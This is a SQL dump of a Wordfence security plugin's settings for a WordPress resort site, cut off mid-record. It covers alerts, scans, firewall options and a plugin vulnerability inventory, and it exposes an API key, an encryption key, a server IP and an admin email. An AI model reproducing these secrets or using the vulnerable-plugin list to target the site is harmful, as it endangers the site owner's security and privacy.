INSERT INTO `ar_wfConfig` VALUES ('alertOn_critical','1','yes'),('alertOn_update','0','yes'),('alertOn_warnings','1','yes'),('alertOn_throttle','0','yes'),('alertOn_block','1','yes'),('alertOn_loginLockout','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_adminLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_wordfenceDeactivated','1','yes'),('liveTrafficEnabled','','yes'),('advancedCommentScanning','1','yes'),('checkSpamIP','1','yes'),('spamvertizeCheck','1','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_displayExpandedRecords','0','no'),('scheduledScansEnabled','1','yes'),('lowResourceScansEnabled','0','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_dns','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('liveActivityPauseEnabled','1','yes'),('firewallEnabled','1','yes'),('blockFakeBots','0','yes'),('autoBlockScanners','1','yes'),('loginSecurityEnabled','1','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('notification_updatesNeeded','1','yes'),('notification_securityAlerts','1','yes'),('notification_promotions','1','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_scanStatus','1','yes'),('other_hideWPVersion','0','yes'),('other_noAnonMemberComments','1','yes'),('other_blockBadPOST','0','yes'),('other_scanComments','1','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_WFNet','1','yes'),('other_scanOutside','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('deleteTablesOnDeact','0','yes'),('autoUpdate','1','yes'),('disableCookies','0','yes'),('startScansRemotely','0','yes'),('disableConfigCaching','0','yes'),('addCacheComment','0','yes'),('disableCodeExecutionUploads','0','yes'),('allowHTTPSCaching','0','yes'),('debugOn','0','yes'),('email_summary_enabled','1','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('ssl_verify','1','yes'),('ajaxWatcherDisabled_front','0','yes'),('ajaxWatcherDisabled_admin','0','yes'),('wafAlertOnAttacks','1','yes'),('disableWAFIPBlocking','0','yes'),('showAdminBarMenu','1','yes'),('displayTopLevelOptions','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayAutomaticBlocks','1','yes'),('scan_include_extra','','yes'),('alertEmails','dbc@expcom.com','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignoreUA','','yes'),('maxMem','256','yes'),('scan_exclude','wp-content/themes/vantage/inc/metaslider.php','yes'),('scan_maxIssues','1000','yes'),('scan_maxDuration','','yes'),('whitelisted','','yes'),('bannedURLs','','yes'),('maxExecutionTime','0','yes'),('howGetIPs','','yes'),('actUpdateInterval','2','yes'),('alert_maxHourly','0','yes'),('loginSec_userBlacklist','','yes'),('liveTraf_maxRows','2000','yes'),('neverBlockBG','neverBlockVerified','yes'),('loginSec_countFailMins','240','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxScanHits','DISABLED','yes'),('maxScanHits_action','throttle','yes'),('blockedTime','300','yes'),('email_summary_interval','weekly','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('wafAlertWhitelist','','yes'),('wafAlertInterval','600','yes'),('wafAlertThreshold','100','yes'),('howGetIPs_trusted_proxies','','yes'),('scanType','standard','yes'),('manualScanType','onceDaily','yes'),('schedStartHour','17','yes'),('schedMode','auto','yes'),('cbl_loggedInBlocked','','yes'),('cbl_action','block','yes'),('cbl_redirURL','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassViewURL','','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('apiKey','e377955896f511be02f0f8ed24008d613271d6067f1596da05cc1f49873169b63759616b0704cd302032acf8c18c2514e609c61a5210316ca0e3095978335942','yes'),('keyType','free','yes'),('isPaid','','yes'),('betaThreatDefenseFeed','0','yes'),('timeoffset_wf_updated','1604081840','yes'),('cacheType','disabled','yes'),('detectProxyRecommendation','REMOTE_ADDR','no'),('dismissAutoPrependNotice','1','yes'),('onboardingAttempt1','license','yes'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('needsNewTour_dashboard','0','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_scan','0','yes'),('needsNewTour_blocking','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_scan','0','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":0},{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":1},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":2},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":3},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":4},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":5},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":6}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blacklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','cd4586d45a3b5b64878637ae274e90636206e42f776f8d456a6203a6bf9eed63','yes'),('encKey','fc9cedd079777354','yes'),('cbl_restOfSiteBlocked','1','yes'),('timeoffset_wf','0','yes'),('geoIPVersionHash','569e8e780b3ac54b74c296f92d8dab1c6563f56a39e99ca39ce96d08ad76c6d7','yes'),('lastBlockAggregation','1604081956','yes'),('allowed404s6116Migration','1','yes'),('migration636_email_summary_excluded_directories','1','no'),('fileContentsGSB6315Migration','1','yes'),('config701Migration','1','yes'),('blocks702Migration','1','yes'),('detectProxyNextCheck','1604686757','no'),('detectProxyNonce','','no'),('serverIP','1598819958;198.46.81.28','yes'),('allScansScheduled','a:0:{}','yes'),('cbl_cookieVal','5abff203ca14e','yes'),('wp_home_url','https://ashbyresort.com','yes'),('wp_site_url','https://ashbyresort.com','yes'),('lastDashboardCheck','1593109433','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1593106843;s:3:\"tdf\";a:3:{s:9:\"community\";i:5710;s:7:\"premium\";i:5711;s:9:\"blacklist\";i:21565;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1593018000;s:1:\"c\";i:4450616;}i:1;a:2:{s:1:\"t\";i:1593021600;s:1:\"c\";i:4481121;}i:2;a:2:{s:1:\"t\";i:1593025200;s:1:\"c\";i:4432691;}i:3;a:2:{s:1:\"t\";i:1593028800;s:1:\"c\";i:4516082;}i:4;a:2:{s:1:\"t\";i:1593032400;s:1:\"c\";i:4655293;}i:5;a:2:{s:1:\"t\";i:1593036000;s:1:\"c\";i:4329398;}i:6;a:2:{s:1:\"t\";i:1593039600;s:1:\"c\";i:4378831;}i:7;a:2:{s:1:\"t\";i:1593043200;s:1:\"c\";i:4388239;}i:8;a:2:{s:1:\"t\";i:1593046800;s:1:\"c\";i:4180169;}i:9;a:2:{s:1:\"t\";i:1593050400;s:1:\"c\";i:4307662;}i:10;a:2:{s:1:\"t\";i:1593054000;s:1:\"c\";i:4316544;}i:11;a:2:{s:1:\"t\";i:1593057600;s:1:\"c\";i:4314233;}i:12;a:2:{s:1:\"t\";i:1593061200;s:1:\"c\";i:4404659;}i:13;a:2:{s:1:\"t\";i:1593064800;s:1:\"c\";i:4353178;}i:14;a:2:{s:1:\"t\";i:1593068400;s:1:\"c\";i:4580239;}i:15;a:2:{s:1:\"t\";i:1593072000;s:1:\"c\";i:4567315;}i:16;a:2:{s:1:\"t\";i:1593075600;s:1:\"c\";i:4354520;}i:17;a:2:{s:1:\"t\";i:1593079200;s:1:\"c\";i:4436503;}i:18;a:2:{s:1:\"t\";i:1593082800;s:1:\"c\";i:5707331;}i:19;a:2:{s:1:\"t\";i:1593086400;s:1:\"c\";i:6137320;}i:20;a:2:{s:1:\"t\";i:1593090000;s:1:\"c\";i:7441540;}i:21;a:2:{s:1:\"t\";i:1593093600;s:1:\"c\";i:4787296;}i:22;a:2:{s:1:\"t\";i:1593097200;s:1:\"c\";i:4568922;}i:23;a:2:{s:1:\"t\";i:1593100800;s:1:\"c\";i:4425583;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1592438400;s:1:\"c\";i:121313811;}i:1;a:2:{s:1:\"t\";i:1592524800;s:1:\"c\";i:116273460;}i:2;a:2:{s:1:\"t\";i:1592611200;s:1:\"c\";i:103880477;}i:3;a:2:{s:1:\"t\";i:1592697600;s:1:\"c\";i:99536152;}i:4;a:2:{s:1:\"t\";i:1592784000;s:1:\"c\";i:105294493;}i:5;a:2:{s:1:\"t\";i:1592870400;s:1:\"c\";i:115091901;}i:6;a:2:{s:1:\"t\";i:1592956800;s:1:\"c\";i:127425888;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1590451200;s:1:\"c\";i:133116896;}i:1;a:2:{s:1:\"t\";i:1590537600;s:1:\"c\";i:139294251;}i:2;a:2:{s:1:\"t\";i:1590624000;s:1:\"c\";i:151338384;}i:3;a:2:{s:1:\"t\";i:1590710400;s:1:\"c\";i:218048793;}i:4;a:2:{s:1:\"t\";i:1590796800;s:1:\"c\";i:180013782;}i:5;a:2:{s:1:\"t\";i:1590883200;s:1:\"c\";i:169227748;}i:6;a:2:{s:1:\"t\";i:1590969600;s:1:\"c\";i:163257338;}i:7;a:2:{s:1:\"t\";i:1591056000;s:1:\"c\";i:159342082;}i:8;a:2:{s:1:\"t\";i:1591142400;s:1:\"c\";i:191548104;}i:9;a:2:{s:1:\"t\";i:1591228800;s:1:\"c\";i:168008447;}i:10;a:2:{s:1:\"t\";i:1591315200;s:1:\"c\";i:123725628;}i:11;a:2:{s:1:\"t\";i:1591401600;s:1:\"c\";i:122456359;}i:12;a:2:{s:1:\"t\";i:1591488000;s:1:\"c\";i:119966292;}i:13;a:2:{s:1:\"t\";i:1591574400;s:1:\"c\";i:137330874;}i:14;a:2:{s:1:\"t\";i:1591660800;s:1:\"c\";i:128192246;}i:15;a:2:{s:1:\"t\";i:1591747200;s:1:\"c\";i:154393856;}i:16;a:2:{s:1:\"t\";i:1591833600;s:1:\"c\";i:127281311;}i:17;a:2:{s:1:\"t\";i:1591920000;s:1:\"c\";i:103758375;}i:18;a:2:{s:1:\"t\";i:1592006400;s:1:\"c\";i:102986559;}i:19;a:2:{s:1:\"t\";i:1592092800;s:1:\"c\";i:117798799;}i:20;a:2:{s:1:\"t\";i:1592179200;s:1:\"c\";i:109989089;}i:21;a:2:{s:1:\"t\";i:1592265600;s:1:\"c\";i:129109921;}i:22;a:2:{s:1:\"t\";i:1592352000;s:1:\"c\";i:114032266;}i:23;a:2:{s:1:\"t\";i:1592438400;s:1:\"c\";i:121313811;}i:24;a:2:{s:1:\"t\";i:1592524800;s:1:\"c\";i:116273460;}i:25;a:2:{s:1:\"t\";i:1592611200;s:1:\"c\";i:103880477;}i:26;a:2:{s:1:\"t\";i:1592697600;s:1:\"c\";i:99536152;}i:27;a:2:{s:1:\"t\";i:1592784000;s:1:\"c\";i:105294493;}i:28;a:2:{s:1:\"t\";i:1592870400;s:1:\"c\";i:115091901;}i:29;a:2:{s:1:\"t\";i:1592956800;s:1:\"c\";i:127425888;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:385120411;}i:1;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:141853118;}i:2;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:124342831;}i:3;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:102089242;}i:4;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:71483395;}i:5;a:2:{s:2:\"cd\";s:2:\"UA\";s:2:\"ct\";i:66862817;}i:6;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:63561370;}i:7;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:61068044;}i:8;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:58198786;}i:9;a:2:{s:2:\"cd\";s:2:\"CA\";s:2:\"ct\";i:47203888;}}}}','yes'),('noc1ScanSchedule','a:3:{i:0;i:1593240600;i:1;i:1593499800;i:2;i:1593759000;}','yes'),('vulnRegex','/(?:wordfence_test_vuln_match|\\/timthumb\\.php|\\/thumb\\.php|\\/thumbs\\.php|\\/thumbnail\\.php|\\/thumbnails\\.php|\\/thumnails\\.php|\\/cropper\\.php|\\/picsize\\.php|\\/resizer\\.php|connectors\\/uploadtest\\.html|connectors\\/test\\.html|mingleforumaction|uploadify\\.php|allwebmenus-wordpress-menu-plugin|wp-cycle-playlist|count-per-day|wp-autoyoutube|pay-with-tweet|comment-rating\\/ck-processkarma\\.php)/i','yes'),('vulnerabilities_plugin','a:22:{i:0;a:4:{s:4:\"slug\";s:7:\"akismet\";s:11:\"fromVersion\";s:5:\"4.1.7\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:4:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:11:\"fromVersion\";s:5:\"4.4.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:4:{s:4:\"slug\";s:7:\"booking\";s:11:\"fromVersion\";s:6:\"8.7.10\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:4:{s:4:\"slug\";s:16:\"booking-calendar\";s:11:\"fromVersion\";s:5:\"2.7.0\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:41:\"https://wpvulndb.com/vulnerabilities/9710\";}i:4;a:4:{s:4:\"slug\";s:24:\"child-theme-configurator\";s:11:\"fromVersion\";s:5:\"2.5.6\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:5;a:4:{s:4:\"slug\";s:14:\"classic-editor\";s:11:\"fromVersion\";s:3:\"1.6\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:6;a:4:{s:4:\"slug\";s:17:\"devices-elementor\";s:11:\"fromVersion\";s:5:\"1.0.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:7;a:4:{s:4:\"slug\";s:14:\"duplicate-page\";s:11:\"fromVersion\";s:3:\"4.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:8;a:4:{s:4:\"slug\";s:9:\"elementor\";s:11:\"fromVersion\";s:6:\"3.0.12\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:9;a:4:{s:4:\"slug\";s:41:\"addon-elements-for-elementor-page-builder\";s:11:\"fromVersion\";s:5:\"1.7.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:10;a:4:{s:4:\"slug\";s:11:\"hello-dolly\";s:11:\"fromVersion\";s:5:\"1.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:11;a:4:{s:4:\"slug\";s:9:\"ml-slider\";s:11:\"fromVersion\";s:6:\"3.18.7\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:12;a:4:{s:4:\"slug\";s:17:\"siteorigin-panels\";s:11:\"fromVersion\";s:6:\"2.11.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:13;a:4:{s:4:\"slug\";s:14:\"press-elements\";s:11:\"fromVersion\";s:5:\"1.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:14;a:4:{s:4:\"slug\";s:17:\"really-simple-ssl\";s:11:\"fromVersion\";s:5:\"3.3.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:15;a:4:{s:4:\"slug\";s:17:\"so-widgets-bundle\";s:11:\"fromVersion\";s:6:\"1.17.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:16;a:4:{s:4:\"slug\";s:26:\"ssl-insecure-content-fixer\";s:11:\"fromVersion\";s:5:\"2.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:17;a:4:{s:4:\"slug\";s:10:\"tablepress\";s:11:\"fromVersion\";s:4:\"1.12\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:18;a:4:{s:4:\"slug\";s:11:\"updraftplus\";s:11:\"fromVersion\";s:7:\"1.16.33\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:19;a:4:{s:4:\"slug\";s:9:\"wordfence\";s:11:\"fromVersion\";s:6:\"7.4.12\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:20;a:4:{s:4:\"slug\";s:12:\"wpforms-lite\";s:11:\"fromVersion\";s:7:\"1.6.3.1\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:21;a:4:{s:4:\"slug\";s:13:\"wordpress-seo\";s:11:\"fromVersion\";s:4:\"15.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('lastPermissionsTemplateCheck','1605538614','yes'),('vulnerabilities_theme','a:3:{i:0;a:4:{s:4:\"slug\";s:13:\"twentyfifteen\";s:9:\"toVersion\";s:3:\"2.7\";s:11:\"fromVersion\";s:3:\"2.6\";s:10:\"vulnerable\";b:0;}i:1;a:4:{s:4:\"slug\";s:14:\"twentyfourteen\";s:9:\"toVersion\";s:3:\"2.9\";s:11:\"fromVersion\";s:3:\"2.8\";s:10:\"vulnerable\";b:0;}i:2;a:4:{s:4:\"slug\";s:13:\"twentysixteen\";s:9:\"toVersion\";s:3:\"2.2\";s:11:\"fromVersion\";s:3:\"2.1\";s:10:\"vulnerable\";b:0;}}','yes'),('lastNotificationID','2014','no'),('totalScansRun','539','yes'),('wfKillRequested','0','no'),('currentCronKey','','yes'),('wf_scanRunning','','yes'),('wf_scanLastStatusTime','0','yes'),('wfPeakMemory','99774464','no'),('wfScanStartVersion','5.4.2','yes'),('lowResourceScanWaitStep','','yes'),('wfStatusStartMsgs','a:21:{i:0;s:0:\"\";i:1;